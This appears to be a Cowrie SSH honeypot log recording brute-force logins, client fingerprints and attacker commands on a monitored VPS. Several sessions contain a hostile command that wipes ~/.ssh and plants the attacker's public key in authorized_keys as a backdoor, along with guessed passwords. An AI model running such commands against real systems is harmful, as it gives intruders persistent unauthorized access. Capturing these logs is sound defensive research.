{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:53:21.533203Z","src_ip":"212.227.125.160","session":"adc9a2080149"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-09-09T07:53:22.523427Z","src_ip":"212.227.125.160","session":"adc9a2080149"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:53:24.552864Z","src_ip":"212.227.125.160","session":"adc9a2080149"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52770,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf4aa88b8814","protocol":"ssh","message":"New connection: 212.227.235.229:52770 (1.2.3.4:22) [session: bf4aa88b8814]","sensor":"my-vps","timestamp":"2025-09-09T07:54:08.070983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:54:08.072263Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:54:08.156021Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.login.success","username":"root","password":"12321","message":"login attempt [root/12321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:54:08.536412Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:54:08.723596Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:54:08.724321Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:54:08.725465Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:54:08.811230Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:54:09.097993Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:54:09.098745Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:54:09.185723Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:54:09.186634Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52786,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2cb3a1e9a24","protocol":"ssh","message":"New connection: 212.227.235.229:52786 (1.2.3.4:22) [session: a2cb3a1e9a24]","sensor":"my-vps","timestamp":"2025-09-09T07:54:09.269442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:54:09.269991Z","src_ip":"212.227.235.229","session":"a2cb3a1e9a24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:54:09.355103Z","src_ip":"212.227.235.229","session":"a2cb3a1e9a24"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:54:09.738657Z","src_ip":"212.227.235.229","session":"a2cb3a1e9a24"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:54:10.825678Z","src_ip":"212.227.235.229","session":"a2cb3a1e9a24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52802,"dst_ip":"1.2.3.4","dst_port":22,"session":"690f2622c43e","protocol":"ssh","message":"New connection: 212.227.235.229:52802 (1.2.3.4:22) [session: 690f2622c43e]","sensor":"my-vps","timestamp":"2025-09-09T07:54:10.908575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:54:10.909364Z","src_ip":"212.227.235.229","session":"690f2622c43e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:54:10.993409Z","src_ip":"212.227.235.229","session":"690f2622c43e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:54:11.370834Z","src_ip":"212.227.235.229","session":"690f2622c43e"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:54:11.456514Z","src_ip":"212.227.235.229","session":"bf4aa88b8814"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:54:11.457476Z","src_ip":"212.227.235.229","session":"690f2622c43e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35766,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b703405bbf8","protocol":"ssh","message":"New connection: 212.227.125.160:35766 (1.2.3.4:22) [session: 5b703405bbf8]","sensor":"my-vps","timestamp":"2025-09-09T07:54:33.085390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:54:33.086713Z","src_ip":"212.227.125.160","session":"5b703405bbf8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:54:33.391759Z","src_ip":"212.227.125.160","session":"5b703405bbf8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T07:54:35.247928Z","src_ip":"212.227.125.160","session":"5b703405bbf8"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:54:37.323187Z","src_ip":"212.227.125.160","session":"5b703405bbf8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65036,"dst_ip":"1.2.3.4","dst_port":22,"session":"de39f81389c4","protocol":"ssh","message":"New connection: 217.72.205.35:65036 (1.2.3.4:22) [session: de39f81389c4]","sensor":"my-vps","timestamp":"2025-09-09T07:55:12.348563Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:55:12.351306Z","src_ip":"217.72.205.35","session":"de39f81389c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41106,"dst_ip":"1.2.3.4","dst_port":22,"session":"110314eb7b8a","protocol":"ssh","message":"New connection: 212.227.235.229:41106 (1.2.3.4:22) [session: 110314eb7b8a]","sensor":"my-vps","timestamp":"2025-09-09T07:55:14.485452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:55:14.486549Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:55:14.570280Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.login.success","username":"root","password":"Demo1234","message":"login attempt [root/Demo1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:55:14.953630Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:55:15.142937Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:55:15.143771Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:55:15.144552Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:55:15.229455Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:55:15.501823Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:55:15.502496Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:55:15.589503Z","src_ip":"212.227.235.229","session":"110314eb7b8a"}
